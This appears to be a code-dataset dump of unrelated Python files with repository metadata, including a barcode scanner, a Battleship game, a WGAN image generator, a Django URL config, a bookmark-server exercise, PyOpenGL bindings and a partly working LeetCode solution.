    change_params('sgfm', {'VpcId': net_output['VpcId']})
    run_cmd('./sgfm-create.sh')
    wait_until_stack_completed("FollowMe")
    sgfm_output = run_cmd('./sgfm-describe.sh')['Stacks'][0]['Outputs']
    print(sgfm_output)
    change_params('core', {'FollowmeSecurityGroup': sgfm_output['FollowmeSgId'],
                           'PublicNetZoneA': net_output['PublicNetZoneA'], 'S3BucketName': s3_output['S3BucketName'],
                           'InstanceType': INSTANCE_TYPE})
    run_cmd('./core-create.sh')
    wait_until_stack_completed("Core")
    core_output = run_cmd('./core-describe.sh')['Stacks'][0]['Outputs']
    print(core_output)
    change_params('cluster', {'VpcId': net_output['VpcId'], 'MasterIP': core_output['MadCorePrivateIp'],
                              'PublicNetZoneA': net_output['PublicNetZoneA'], 'S3BucketName': s3_output['S3BucketName'],
                              'InstanceType': INSTANCE_TYPE, 'SpotPrice': SPOT_PRICE})
    run_cmd('./cluster-create.sh')
    wait_until_stack_completed("Cluster")
    cluster_output = run_cmd('./cluster-describe.sh')['Stacks'][0]['Outputs']
    print(cluster_output)
    change_params('dns', {'SubDomainName': SUBDOMAIN, 'EC2PublicIP': core_output['MadCorePublicIp']})
    run_cmd('./dns-create.sh')
    wait_until_stack_completed("Dns")
    dns_output = run_cmd('./dns-describe.sh')['Stacks'][0]['Outputs']
    print(dns_output)
"chiricagheorghe@gmail.com"
] | chiricagheorghe@gmail.com |
bc6c12b391007c882524d48ee3fa5f2f0d388438 | c899db9dfaf33ac06418ba3431f9aa22b5ae9b85 | /UserInterface/barcode.py | 5a6d35f5b4bbe713fd52e33833da5cbbd7ba06ab | [] | no_license | luben3485/Robot_Smart_Shopping_Cart | 13f4c2882b973840f9fefa9dacb1a51d48ca26e6 | 2028cfa45e34930afa73e83836feae7b2421b48b | refs/heads/master | 2023-07-14T11:26:05.713973 | 2023-07-03T20:43:54 | 2023-07-03T20:43:54 | 156,553,235 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,548 | py | # USAGE
# python barcode_scanner_video.py
# import the necessary packages
from imutils.video import VideoStream
from pyzbar import pyzbar
import argparse
import datetime
import imutils
import time
import cv2
def barcode():
global barcodeData
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-o", "--output", type=str, default="barcodes.csv",
help="path to output CSV file containing barcodes")
args = vars(ap.parse_args())
# initialize the video stream and allow the camera sensor to warm up
print("[INFO] starting video stream...")
# vs = VideoStream(src=0).start()
vs = VideoStream(usePiCamera=True).start()
time.sleep(2.0)
# open the output CSV file for writing and initialize the set of
# barcodes found thus far
csv = open(args["output"], "w")
found = set()
# loop over the frames from the video stream
while True:
# grab the frame from the threaded video stream and resize it to
# have a maximum width of 400 pixels
frame = vs.read()
frame = imutils.resize(frame, width=400)
# find the barcodes in the frame and decode each of the barcodes
barcodes = pyzbar.decode(frame)
# loop over the detected barcodes
for barcode in barcodes:
# extract the bounding box location of the barcode and draw
# the bounding box surrounding the barcode on the image
(x, y, w, h) = barcode.rect
#cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)
# the barcode data is a bytes object so if we want to draw it
# on our output image we need to convert it to a string first
barcodeData = barcode.data.decode("utf-8")
barcodeType = barcode.type
# draw the barcode data and barcode type on the image
text = "{} ({})".format(barcodeData, barcodeType)
# cv2.putText(frame, text, (x, y - 10),
# cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
#
# if the barcode text is currently not in our CSV file, write
# the timestamp + barcode to disk and update the set
# if barcodeData not in found:
# csv.write("{},{}\n".format(datetime.datetime.now(),
# barcodeData))
# csv.flush()
# found.add(barcodeData)
if barcodes:
vs.stop()
csv.close()
cv2.destroyAllWindows()
break
# show the output frame
cv2.imshow("Barcode Scanner", frame)
key = cv2.waitKey(1) & 0xFF
#if the `q` key was pressed, break from the loop
#if key == ord("q"):
# break
# close the output CSV file do a bit of cleanup
#print("[INFO] cleaning up...")
return barcodeData
if __name__== '__main__':
barcode()
| [
"luben3485@gmail.com"
] | luben3485@gmail.com |
c10d62fd2bf5afad938041b5b59a3a981f86020d | 9e0c4fc9995c556e0075c5a4e658977aca3a10f1 | /Opgave_8 week 2.py | 1f6c485ccbfea5028c1a5ac87142f364dac2e77f | [] | no_license | dylandale97/python | 301cdb557ae904b48d826ca24f80560723b451ca | 01436858482c601c875ce34e7e75420e9b182df8 | refs/heads/master | 2020-07-31T09:39:41.190019 | 2019-10-17T13:43:42 | 2019-10-17T13:43:42 | 210,563,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,911 | py | from random import randint
BOARD_SIZE = 4
NR_GUESSES = 4
# initializing board
board = []
for x in range(BOARD_SIZE):
board.append(["O"] * BOARD_SIZE)
def print_board(board):
for row in board:
print (" ".join(row))
# start the game and printing the board
print("Let's play Battleship!")
print_board(board)
# define where the ship is
ship_row = randint(0, BOARD_SIZE-1)
ship_col = randint(0, BOARD_SIZE-1)
guessL = []
won = 0
validation = True
while NR_GUESSES > 0:
tempL = [0,0]
print('Make a guess: ')
print('Wich row?: ')
guessrow = int(input())
print('Wich place?: ')
guessplace = int(input())
if guessplace <= 0 or guessrow <= 0 or guessplace > 4 or guessrow > 4:
validation = False
print('Pick a value between 0 and 4')
print('Wich row?: ')
guessrow = int(input())
print('Wich place?: ')
guessplace = int(input())
for x in guessL:
while x[0] == guessrow and x[1] == guessplace:
print('This value is already chosen')
print('Wich row?: ')
guessrow = int(input())
print('Wich place?: ')
guessplace = int(input())
# while x[0] == guessrow and x[1] == guessplace or guessplace <= 0 or guessrow <= 0 or guessplace > 4 or guessrow > 4:
# validation = False
# if x[0] == guessrow and x[1] == guessplace:
# print('This value is already chosen')
# print('Wich row?: ')
# guessrow = int(input())
# print('Wich place?: ')
# guessplace = int(input())
# if guessplace<=0 or guessrow<=0 or guessplace>4 or guessrow>4:
# print('Pick a value between 0 and 4')
# print('Wich row?: ')
# guessrow = int(input())
# print('Wich place?: ')
# guessplace = int(input())
# while x[0] == guessrow and x[1] == guessplace:
# print('This value is already chosen')
# print('Wich row?: ')
# guessrow = int(input())
# print('Wich place?: ')
# guessplace = int(input())
# while guessplace<=0 or guessrow<=0 or guessplace>4 or guessrow>4:
# print('Pick a value between 0 and 4')
# print('Wich row?: ')
# guessrow = int(input())
# print('Wich place?: ')
# guessplace = int(input())
tempL[0] = guessrow
tempL[1] = guessplace
if guessrow == ship_row and guessplace == ship_col:
print('You won!')
won = 1
break
for x in range(BOARD_SIZE):
if x+1 == guessrow:
temp = board[guessrow-1]
temp[guessplace-1] = 'x'
print_board(board)
guessL.append(tempL)
NR_GUESSES = NR_GUESSES - 1
if won == 0:
print("Game Over")
| [
"loranvanwingerden@gmail.com"
] | loranvanwingerden@gmail.com |
a5e62068f9d865390a9f89672b455a13c530a395 | 3c682d2db0c4f85f70dee95d88f8205fed5bbf95 | /2-2generator.py | 70ff1f11b253b389e87179a4cd5b9306f397d026 | [] | no_license | john81923/VAE-DCGAN | 9d99afc59daa4dd4c2191e01eff632019a053cf9 | 5a0455a023b7359299200f4b4f1d7dc7e775db8f | refs/heads/master | 2020-09-16T10:48:22.079402 | 2019-11-24T13:18:47 | 2019-11-24T13:18:47 | 223,746,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,669 | py | import numpy as np
import tensorflow as tf
from skip_thoughts import skipthoughts
import scipy.misc
import skimage
import skimage.io
import skimage.transform
import matplotlib.pyplot as plt
from ops import *
import data_reader
from data_reader import realimg
import os
import sys
import re
import cPickle as pk
def conv_out_size_same(size, stride):
return int(math.ceil(float(size) / float(stride)))
class WGAN(object):
def __init__(self, sess, img_h, img_w, img_c, op):
#---input setting---#
self.sess = sess
self.op = op
self.output_height, self.output_width = img_h, img_w
self.c_dim = img_c
self.orig_embed_size = 4800
#---training data---#
if op == "train":
self.batch_size = 64
print "loading training data......"
with open("./train_data/img_objs_new.pk", "r") as f:
img_objs = pk.load(f)
batch = data_reader.get_train_batch(img_objs, self.batch_size)
self.rimg_batch = batch[0]
self.wimg_batch = batch[1]
self.match_embed_batch = batch[2]
self.mismatch_embed_batch = batch[3]
#---testing data---#
if op == "test":
self.batch_size = 1
self.test_sent = tf.placeholder(tf.float32, shape=
[1, self.orig_embed_size])
#---model network setting---#
self.gf_dim = 64
self.df_dim = 64
self.z_dim = 100
self.embed_size = 128
self.keep_prob = tf.placeholder(tf.float32)
#---batch_norm of discriminator---#
self.d_bn0 = batch_norm(name="d_bn0")
self.d_bn1 = batch_norm(name="d_bn1")
self.d_bn2 = batch_norm(name="d_bn2")
self.d_bn3 = batch_norm(name="d_bn3")
self.d_bn4 = batch_norm(name="d_bn4")
#---batch_norm of generator---#
self.g_bn0 = batch_norm(name="g_bn0")
self.g_bn1 = batch_norm(name="g_bn1")
self.g_bn2 = batch_norm(name="g_bn2")
self.g_bn3 = batch_norm(name="g_bn3")
#---build model---#
print "building model......"
self.build_model()
def build_model(self):
#---Prepare data tensor---#
# Draw sample from random noise
self.z = tf.placeholder(tf.float32, [None, self.z_dim], name='z')
# Encode testing captions
if self.op == "test":
self.test_embed = self.sent_dim_reducer(self.test_sent, name='g_sent_reduce')
self.sample_in = tf.concat([self.z, self.test_embed], 1)
self.sample = self.sampler(self.sample_in)
self.saver = tf.train.Saver()
return
# Encode matching captions
self.g_h = self.sent_dim_reducer(self.match_embed_batch, name='g_sent_reduce')
self.d_h = self.sent_dim_reducer(self.match_embed_batch, name='d_sent_reduce')
# Encode mis-matching captions
self.d_h_ = self.sent_dim_reducer(self.mismatch_embed_batch, name='d_sent_reduce', reuse=True)
# flip image horizontally
self.rimg_batch_flip = []
for i in range(self.rimg_batch.shape[0]):
self.rimg_batch_flip.append(
tf.image.random_flip_left_right(self.rimg_batch[i]))
self.rimg_batch_flip = tf.convert_to_tensor(self.rimg_batch_flip)
#---Forward through generator---#
self.G_in = tf.concat([self.z, self.g_h], 1)
self.fimg_batch = self.generator(self.G_in)
#---Forward through discriminator---#
# real image, right text
self.ri, self.ri_logits = self.discriminator(
self.d_h, self.rimg_batch_flip, reuse=False)
ri, ri_logits = self.ri, self.ri_logits
# fake image, right text
self.fi, self.fi_logits = self.discriminator(
self.d_h, self.fimg_batch, reuse=True)
fi, fi_logits = self.fi, self.fi_logits
# real image, wrong text
self.wt, self.wt_logits = self.discriminator(
self.d_h_, self.rimg_batch_flip, reuse=True)
wt, wt_logits = self.wt, self.wt_logits
# wrong image, right text
self.wi, self.wi_logits = self.discriminator(
self.d_h, self.wimg_batch, reuse=True)
wi, wi_logits = self.wi, self.wi_logits
#---define loss tensor---#
# loss of generator
self.g_loss = tf.reduce_mean(-fi_logits)
# loss of discriminator
self.d_loss = (
tf.reduce_mean(ri_logits) -
tf.reduce_mean(fi_logits) -
tf.reduce_mean(wt_logits) -
tf.reduce_mean(wi_logits)
)
#---seperate the variables of discriminator and generator by name---#
t_vars = tf.trainable_variables()
self.d_vars = [var for var in t_vars if 'd_' in var.name]
self.g_vars = [var for var in t_vars if 'g_' in var.name]
self.saver = tf.train.Saver()
#---weight clipping---#
self.d_clip = [p.assign(tf.clip_by_value(p, -0.01, 0.01)) for p in self.d_vars]
#---training op---#
learning_rate_d = 0.00005
learning_rate_g = 0.00005
self.d_optim = tf.train.RMSPropOptimizer(learning_rate_d).minimize(
-self.d_loss, var_list=self.d_vars)
self.g_optim = tf.train.RMSPropOptimizer(learning_rate_g).minimize(
self.g_loss, var_list=self.g_vars)
def train(self):
# session
sess = self.sess
# initial all variable
sess.run(tf.global_variables_initializer())
tf.train.start_queue_runners(sess)
for epoch in range(100000):
# sample noise
batch_z = np.random.uniform(
-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)
print "--------------------------------"
print "epoch {}".format(epoch)
# update discriminator parameters
for _ in range(5):
fetches = {
"d_loss": self.d_loss,
"d_optim": self.d_optim,
"d_clip": self.d_clip,
}
feed_dict = {
self.z: batch_z,
self.keep_prob: 1.0,
}
vals = sess.run(fetches, feed_dict=feed_dict)
d_loss = vals["d_loss"]
print "d_loss {}".format(d_loss)
# update generator parameters
for _ in range(1):
fetches = {
"real_imgs": self.rimg_batch_flip,
"sample_imgs": self.fimg_batch,
"g_loss": self.g_loss,
"g_optim": self.g_optim,
}
feed_dict = {
self.z: batch_z,
self.keep_prob: 1.0,
}
vals = sess.run(fetches, feed_dict=feed_dict)
g_loss = vals["g_loss"]
sample_imgs = vals["sample_imgs"]
print "g_loss {}".format(g_loss)
# save and test the model
if (epoch+1) % 100 == 0:
self.save('./wgan_new/', epoch)
# for idx, img in enumerate(sample_imgs):
# skimage.io.imsave("./sample/{}.jpg".format(idx), img)
def test(self):
# load model
model_name = 'wgan_new'
test_dir = './samples/'
if not os.path.exists(test_dir):
os.makedirs(test_dir)
self.load("./{}/".format(model_name))
sess = self.sess
test_sent = data_reader.get_test_sent(sys.argv[1])
for idx, sent in enumerate(test_sent):
sent = np.reshape(sent, (1, -1))
for i in range(5):
z = np.random.uniform(-1, 1, [1, self.z_dim]).astype(np.float32)
fetches = {
"sample_in": self.sample_in,
"sample_img": self.sample
}
feed_dict = {
self.test_sent: sent,
self.z: z,
}
vals = sess.run(fetches, feed_dict=feed_dict)
# write out the generated image
sample_img = vals["sample_img"]
skimage.io.imsave("{}/sample_{}_{}.jpg".format(
test_dir, idx+1, i+1), sample_img)
def sent_dim_reducer(self, sent, name, reuse=False):
with tf.variable_scope("sent_dim_reducer") as scope:
if reuse:
scope.reuse_variables()
w = tf.get_variable(
"{}_w".format(name), [self.orig_embed_size, self.embed_size],
tf.float32, tf.random_normal_initializer(stddev=0.01))
b = tf.get_variable(
"{}_b".format(name), [self.embed_size],
tf.float32, initializer=tf.constant_initializer(0.0))
embed = tf.matmul(sent, w) + b
return embed
def discriminator(self, sent, image, reuse=False):
with tf.variable_scope("discriminator") as scope:
print "Discriminator"
if reuse:
scope.reuse_variables()
print image.shape
h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv'))
print h0.shape
h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv')))
print h1.shape
h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv')))
print h2.shape
h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, name='d_h3_conv')))
print h3.shape
sent_repicate = sent
for i in range(int(h3.shape[1])**2 - 1):
sent_repicate = tf.concat([sent_repicate, sent], 1)
sent_repicate = tf.reshape(
sent_repicate,
[self.batch_size, int(h3.shape[1]), int(h3.shape[1]), -1])
h3 = tf.concat([h3, sent_repicate], 3)
print h3.shape
h4 = lrelu(self.d_bn4(conv2d(
h3, self.df_dim*8, 1, 1, 1, 1, name = "d_h4_conv")))
print h4.shape
h5 = linear(tf.reshape(h4, [self.batch_size, -1]), 1, 'd_h4_lin')
print h5.shape
return tf.nn.sigmoid(h5), h5
def generator(self, z, reuse=False):
print "Generator"
with tf.variable_scope("generator") as scope:
if reuse:
scope.reuse_variables()
s_h, s_w = self.output_height, self.output_width
s_h2, s_w2 = conv_out_size_same(s_h, 2), conv_out_size_same(s_w, 2)
s_h4, s_w4 = conv_out_size_same(s_h2, 2), conv_out_size_same(s_w2, 2)
s_h8, s_w8 = conv_out_size_same(s_h4, 2), conv_out_size_same(s_w4, 2)
s_h16, s_w16 = conv_out_size_same(s_h8, 2), conv_out_size_same(s_w8, 2)
# project `z` and reshape
self.z_, self.h0_w, self.h0_b = linear(
z, (s_h16*s_w16*self.gf_dim*8), 'g_h0_lin', with_w=True)
self.h0 = tf.reshape(
self.z_, [-1, s_h16, s_w16, self.gf_dim*8])
h0 = tf.nn.relu(self.g_bn0(self.h0))
print h0.shape
self.h1, self.h1_w, self.h1_b = deconv2d(
h0, [self.batch_size, s_h8, s_w8, self.gf_dim*4],
name='g_h1', with_w=True)
h1 = tf.nn.dropout(tf.nn.relu(self.g_bn1(self.h1)), self.keep_prob)
print h1.shape
self.h2, self.h2_w, self.h2_b = deconv2d(
h1, [self.batch_size, s_h4, s_w4, self.gf_dim*2],
name='g_h2', with_w=True)
h2 = tf.nn.dropout(tf.nn.relu(self.g_bn2(self.h2)), self.keep_prob)
print h2.shape
self.h3, self.h3_w, self.h3_b = deconv2d(
h2, [self.batch_size, s_h2, s_w2, self.gf_dim*1],
name='g_h3', with_w=True)
h3 = tf.nn.dropout(tf.nn.relu(self.g_bn3(self.h3)), self.keep_prob)
print h3.shape
self.h4, self.h4_w, self.h4_b = deconv2d(
h3, [self.batch_size, s_h, s_w, self.c_dim],
name='g_h4', with_w=True)
print self.h4.shape
return tf.nn.tanh(self.h4)
def sampler(self, z):
with tf.variable_scope("generator") as scope:
# scope.reuse_variables()
s_h, s_w = self.output_height, self.output_width
s_h2, s_w2 = conv_out_size_same(s_h, 2), conv_out_size_same(s_w, 2)
s_h4, s_w4 = conv_out_size_same(s_h2, 2), conv_out_size_same(s_w2, 2)
s_h8, s_w8 = conv_out_size_same(s_h4, 2), conv_out_size_same(s_w4, 2)
s_h16, s_w16 = conv_out_size_same(s_h8, 2), conv_out_size_same(s_w8, 2)
# project `z` and reshape
self.z_, self.h0_w, self.h0_b = linear(
z, (s_h16*s_w16*self.gf_dim*8), 'g_h0_lin', with_w=True)
self.h0 = tf.reshape(
self.z_, [-1, s_h16, s_w16, self.gf_dim*8])
h0 = tf.nn.relu(self.g_bn0(self.h0, train=False))
self.h1 = deconv2d(
h0, [self.batch_size, s_h8, s_w8, self.gf_dim*4], name='g_h1')
h1 = tf.nn.relu(self.g_bn1(self.h1, train=False))
self.h2 = deconv2d(
h1, [self.batch_size, s_h4, s_w4, self.gf_dim*2], name='g_h2')
h2 = tf.nn.relu(self.g_bn2(self.h2, train=False))
self.h3 = deconv2d(
h2, [self.batch_size, s_h2, s_w2, self.gf_dim*1], name='g_h3')
h3 = tf.nn.relu(self.g_bn3(self.h3, train=False))
self.h4 = deconv2d(
h3, [self.batch_size, s_h, s_w, self.c_dim], name='g_h4')
return tf.nn.tanh(self.h4)
def save(self, checkpoint_dir, step):
model_name = "basic_all.model"
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(
self.sess, os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoints...")
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
counter = int(next(re.finditer("(\d+)(?!.*\d)",ckpt_name)).group(0))
print(" [*] Success to read {}".format(ckpt_name))
return True, counter
else:
print(" [*] Failed to find a checkpoint")
return False, 0
sess = tf.Session()
test_model = WGAN(sess, 64, 64, 3, "test")
test_model.test()
| [
"johnny@Johnnyde-MacBook-Pro.local"
] | johnny@Johnnyde-MacBook-Pro.local |
7eae7b743e1fdb51757eab7546ee206614610ba1 | 43b4cabe8b711d9eb6988a17d0914cf95ac1c5a1 | /Lesson-2/7_BookmarkServer/BookmarkServer.py | b42fd8ceecfd9c42216f26e2953ac331e00dca63 | [] | no_license | fatih-iver/course-ud303 | c9aae321336c8e0b3ed1e671338cc993d04dc34b | 64d2107891cc24d303dffb98216a72505eeeb217 | refs/heads/master | 2020-03-24T21:57:30.923020 | 2018-08-04T11:50:20 | 2018-08-04T11:50:20 | 143,059,407 | 0 | 0 | null | 2018-07-31T19:40:50 | 2018-07-31T19:40:49 | null | UTF-8 | Python | false | false | 5,827 | py | #!/usr/bin/env python3
#
# A *bookmark server* or URI shortener that maintains a mapping (dictionary)
# between short names and long URIs, checking that each new URI added to the
# mapping actually works (i.e. returns a 200 OK).
#
# This server is intended to serve three kinds of requests:
#
# * A GET request to the / (root) path. The server returns a form allowing
# the user to submit a new name/URI pairing. The form also includes a
# listing of all the known pairings.
# * A POST request containing "longuri" and "shortname" fields. The server
# checks that the URI is valid (by requesting it), and if so, stores the
# mapping from shortname to longuri in its dictionary. The server then
# redirects back to the root path.
# * A GET request whose path contains a short name. The server looks up
# that short name in its dictionary and redirects to the corresponding
# long URI.
#
# Your job in this exercise is to finish the server code.
#
# Here are the steps you need to complete:
#
# 1. Write the CheckURI function, which takes a URI and returns True if a
# request to that URI returns a 200 OK, and False otherwise.
#
# 2. Write the code inside do_GET that sends a 303 redirect to a known name.
#
# 3. Write the code inside do_POST that sends a 400 error if the form fields
# are missing.
#
# 4. Write the code inside do_POST that sends a 303 redirect to the form
# after saving a newly submitted URI.
#
# 5. Write the code inside do_POST that sends a 404 error if a URI is not
# successfully checked (i.e. if CheckURI returns false).
#
# In each step, you'll need to delete a line of code that raises the
# NotImplementedError exception. These are there as placeholders in the
# starter code.
#
# After writing each step, restart the server and run test.py to test it.
import http.server
import requests
from urllib.parse import unquote, parse_qs
memory = {}
form = '''<!DOCTYPE html>
<title>Bookmark Server</title>
<form method="POST">
<label>Long URI:
<input name="longuri">
</label>
<br>
<label>Short name:
<input name="shortname">
</label>
<br>
<button type="submit">Save it!</button>
</form>
<p>URIs I know about:
<pre>
{}
</pre>
'''
def CheckURI(uri, timeout=5):
'''Check whether this URI is reachable, i.e. does it return a 200 OK?
This function returns True if a GET request to uri returns a 200 OK, and
False if that GET request returns any other response, or doesn't return
(i.e. times out).
'''
try:
r = requests.get(uri, timeout=timeout)
# If the GET request returns, was it a 200 OK?
return r.status_code == 200
except requests.RequestException:
# If the GET request raised an exception, it's not OK.
return False
class Shortener(http.server.BaseHTTPRequestHandler):
def do_GET(self):
# A GET request will either be for / (the root path) or for /some-name.
# Strip off the / and we have either empty string or a name.
name = unquote(self.path[1:])
if name:
if name in memory:
# 2. Send a 303 redirect to the long URI in memory[name].
self.send_response(303)
longuri = memory[name]
self.send_header('Location', longuri)
self.end_headers()
else:
# We don't know that name! Send a 404 error.
self.send_response(404)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write("I don't know '{}'.".format(name).encode())
else:
# Root path. Send the form.
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
# List the known associations in the form.
known = "\n".join("{} : {}".format(key, memory[key])
for key in sorted(memory.keys()))
self.wfile.write(form.format(known).encode())
def do_POST(self):
# Decode the form data.
length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(length).decode()
params = parse_qs(body)
# Check that the user submitted the form fields.
if "longuri" not in params or "shortname" not in params:
# 3. Serve a 400 error with a useful message.
self.send_response(400)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write("Missing form fields!".encode())
return
longuri = params["longuri"][0]
shortname = params["shortname"][0]
if CheckURI(longuri):
# This URI is good! Remember it under the specified name.
memory[shortname] = longuri
# 4. Serve a redirect to the root page (the form).
self.send_response(303)
self.send_header('Location', '/')
self.end_headers()
else:
# Didn't successfully fetch the long URI.
# 5. Send a 404 error with a useful message.
self.send_response(404)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write("Couldn't fetch URI '{}'. Sorry!".format(longuri).encode())
if __name__ == '__main__':
port = int(os.environ.get('PORT', 8000)) # Use PORT if it's there.
server_address = ('', port)
httpd = http.server.HTTPServer(server_address, Shortener)
httpd.serve_forever()
| [
"noreply@github.com"
] | fatih-iver.noreply@github.com |
0819047a96b945379572f7777ee4e6e16873fa80 | 3113f2ee8ff62b41a967e4381386f9379a0721d2 | /beers/urls.py | 22991583e9aea02b5605705db5f7fcc9678da06f | [] | no_license | Utkarsh1308/Beer-Diary | c804a96ba0d4d5d0b3a8a676e9e6b024e5ad81b3 | 0075f7aaddf05d061f113cce612cd2318d2b91f2 | refs/heads/master | 2022-06-13T16:54:59.766439 | 2020-05-05T03:11:40 | 2020-05-05T03:11:40 | 257,497,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | from django.urls import path
from . import views
app_name = "beers"
urlpatterns = [
path('', views.index, name='index'),
path('beer', views.detail, name='detail'),
path('beer/<slug:author>/<slug:beer>', views.beer, name='beer'),
path('add/beer', views.AddBeer.as_view(), name='add_beer'),
path('<slug:pk>/update', views.UpdateBeer.as_view(), name='update_beer'),
path('<slug:pk>/delete', views.DeleteBeer.as_view(), name='delete_beer'),
path('register', views.register, name='register'),
path('login', views.login_user, name='login_user'),
path('logout', views.logout_user, name='logout_user'),
path('posts', views.BeerList.as_view())
]
| [
"f20160600@goa.bits-pilani.ac.in"
] | f20160600@goa.bits-pilani.ac.in |
759f2892a4b03efd81ece2f4d33a6eba2ba16139 | 5e84763c16bd6e6ef06cf7a129bb4bd29dd61ec5 | /blimgui/dist/OpenGL/raw/GLX/MESA/query_renderer.py | 072891b41d9ef525470951c92ec96a668f34048f | [
"MIT"
] | permissive | juso40/bl2sdk_Mods | 8422a37ca9c2c2bbf231a2399cbcb84379b7e848 | 29f79c41cfb49ea5b1dd1bec559795727e868558 | refs/heads/master | 2023-08-15T02:28:38.142874 | 2023-07-22T21:48:01 | 2023-07-22T21:48:01 | 188,486,371 | 42 | 110 | MIT | 2022-11-20T09:47:56 | 2019-05-24T20:55:10 | Python | UTF-8 | Python | false | false | 2,034 | py | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLX import _types as _cs
# End users want this...
from OpenGL.raw.GLX._types import *
from OpenGL.raw.GLX import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLX_MESA_query_renderer'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLX,'GLX_MESA_query_renderer',error_checker=_errors._error_checker)
GLX_RENDERER_ACCELERATED_MESA=_C('GLX_RENDERER_ACCELERATED_MESA',0x8186)
GLX_RENDERER_DEVICE_ID_MESA=_C('GLX_RENDERER_DEVICE_ID_MESA',0x8184)
GLX_RENDERER_OPENGL_COMPATIBILITY_PROFILE_VERSION_MESA=_C('GLX_RENDERER_OPENGL_COMPATIBILITY_PROFILE_VERSION_MESA',0x818B)
GLX_RENDERER_OPENGL_CORE_PROFILE_VERSION_MESA=_C('GLX_RENDERER_OPENGL_CORE_PROFILE_VERSION_MESA',0x818A)
GLX_RENDERER_OPENGL_ES2_PROFILE_VERSION_MESA=_C('GLX_RENDERER_OPENGL_ES2_PROFILE_VERSION_MESA',0x818D)
GLX_RENDERER_OPENGL_ES_PROFILE_VERSION_MESA=_C('GLX_RENDERER_OPENGL_ES_PROFILE_VERSION_MESA',0x818C)
GLX_RENDERER_PREFERRED_PROFILE_MESA=_C('GLX_RENDERER_PREFERRED_PROFILE_MESA',0x8189)
GLX_RENDERER_UNIFIED_MEMORY_ARCHITECTURE_MESA=_C('GLX_RENDERER_UNIFIED_MEMORY_ARCHITECTURE_MESA',0x8188)
GLX_RENDERER_VENDOR_ID_MESA=_C('GLX_RENDERER_VENDOR_ID_MESA',0x8183)
GLX_RENDERER_VERSION_MESA=_C('GLX_RENDERER_VERSION_MESA',0x8185)
GLX_RENDERER_VIDEO_MEMORY_MESA=_C('GLX_RENDERER_VIDEO_MEMORY_MESA',0x8187)
@_f
@_p.types(_cs.Bool,_cs.c_int,ctypes.POINTER(_cs.c_uint))
def glXQueryCurrentRendererIntegerMESA(attribute,value):pass
@_f
@_p.types(ctypes.c_char_p,_cs.c_int)
def glXQueryCurrentRendererStringMESA(attribute):pass
@_f
@_p.types(_cs.Bool,ctypes.POINTER(_cs.Display),_cs.c_int,_cs.c_int,_cs.c_int,ctypes.POINTER(_cs.c_uint))
def glXQueryRendererIntegerMESA(dpy,screen,renderer,attribute,value):pass
@_f
@_p.types(ctypes.c_char_p,ctypes.POINTER(_cs.Display),_cs.c_int,_cs.c_int,_cs.c_int)
def glXQueryRendererStringMESA(dpy,screen,renderer,attribute):pass
| [
"justin.sostmann@googlemail.com"
] | justin.sostmann@googlemail.com |
b28006b857c0c0978a02ab65f50d97a71850347d | aaa3626b896d29d4713f7a780580ed29e0bb4ed1 | /leetcode/medium/Trees/DeleteNode.py | 9f0c53c49c150f2a58cba06d2909352351b11f64 | [
"MIT"
] | permissive | rohan8594/DS-Algos | 1c59944cfffddf113a8806f138df285818b58dfe | 889bde40bfcd4a4f25f889355f9c5a83b9ead7d7 | refs/heads/master | 2021-06-25T14:37:55.469940 | 2020-10-17T20:41:34 | 2020-10-17T20:41:34 | 150,487,058 | 3 | 21 | MIT | 2020-10-23T17:19:00 | 2018-09-26T20:36:39 | Python | UTF-8 | Python | false | false | 2,108 | py | # Given a root node reference of a BST and a key, delete the node with the given key in the BST. Return the root node reference (possibly updated) of the BST.
# Basically, the deletion can be divided into two stages:
# Search for a node to remove.
# If the node is found, delete the node.
# Note: Time complexity should be O(height of tree).
# Example:
# root = [5,3,6,2,4,null,7]
# key = 3
# 5
# / \
# 3 6
# / \ \
# 2 4 7
# Given key to delete is 3. So we find the node with value 3 and delete it.
# One valid answer is [5,4,6,2,null,null,7].
# Another valid answer is [5,2,6,null,4,null,7], shown in the following BST.
# 5
# / \
# 2 6
# \ \
# 4 7
# NOTE: Only 48 / 85 test cases passing. Check leetcode or J Portilla's soln for correct soln.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def deleteNode(self, root: TreeNode, key: int) -> TreeNode:
if not root:
return None
if root.val == key:
temp = root.right
root = root.left
if root:
if root.right:
root.right.right = temp
else:
root.right = temp
return root
node = root
while node:
prev = node
if node.val > key:
node = node.left
elif node.val < key:
node = node.right
if not node:
continue
if node.val == key:
temp = node.right
node = node.left
if prev.left:
if prev.left.val == key:
prev.left = node
elif prev.right:
if prev.right.val == key:
prev.right = node
if node:
if node.right:
node.right.right = temp
else:
node.right = temp
break
return root
| [
"rohan.8594@gmail.com"
] | rohan.8594@gmail.com |
